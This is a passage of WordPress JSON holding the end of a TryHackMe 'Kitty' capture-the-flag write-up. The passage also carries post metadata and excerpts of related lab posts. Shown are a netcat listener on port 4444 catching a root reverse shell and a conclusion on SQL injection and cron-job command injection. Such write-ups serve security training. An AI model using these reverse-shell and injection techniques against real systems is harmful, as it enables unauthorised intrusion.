#C3E88D\">-lvnp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4444<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">listening<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">on<\/span><span style=\"color: #BABED8\"> [any] 4444 ...<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">connect<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> [10.13.1.112] from <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">UNKNOWN<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #BABED8\">.49.10<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 60092<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">bash:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cannot<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">set<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">terminal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">process<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">group<\/span><span style=\"color: #BABED8\"> (2264): Inappropriate ioctl <\/span><span style=\"color: #89DDFF; font-style: italic\">for<\/span><span style=\"color: #BABED8\"> device<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">bash:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">no<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">job<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">control<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">this<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">shell<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">root@kitty:~#<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h3>\n\n\n\n<p>This box has two injection-type attacks&#8211;SQL injection to get a foothold and Command injection to get root. Although the box was vulnerable to SQLi, <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>sqlmap <\/em><\/strong><\/mark>was unable to find the injection point. Automating the SQLi gave us the username and password from the MySQL database. It was important to understand the cron job and what it is doing to successfully abuse the script to carry out command injection and get root access.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. PORT 80 HTTP The webpage has a login form. We [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,43,11,13,42,12],"tags":[],"class_list":["post-422","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-command-injection","category-ctf-write-ups","category-linux","category-sql-injection","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":422,"position":0},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":422,"position":1},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":168,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-bulletproof-penguin\/","url_meta":{"origin":422,"position":2},"title":"TryHackMe: Bulletproof Penguin","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Bulletproof plugin\u00a0is an easy room that deals with hardening security on the common services that run on a Linux machine. This room covers services such as FTP, MySQL, Redis, SSH, etc., and how their configurations can be changed to secure them from unauthorized access. Our goal in each task is\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":447,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","url_meta":{"origin":422,"position":3},"title":"TryHackMe: Red Team Capstone Challenge","author":"ishsome","date":"February 18, 2024","format":false,"excerpt":"The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact.\u2026","rel":"","context":"In &quot;Active Directory&quot;","block_context":{"text":"Active Directory","link":"https:\/\/blog.ishsome.com\/index.php\/category\/active-directory\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":434,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","url_meta":{"origin":422,"position":4},"title":"What Is Log Poisoning?","author":"ishsome","date":"February 3, 2024","format":false,"excerpt":"Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":422,"position":5},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/422","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=422"}],"version-history":[{"count":2,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/422\/revisions"}],"predecessor-version":[{"id":446,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/422\/revisions\/446"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=422"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=422"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=422"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}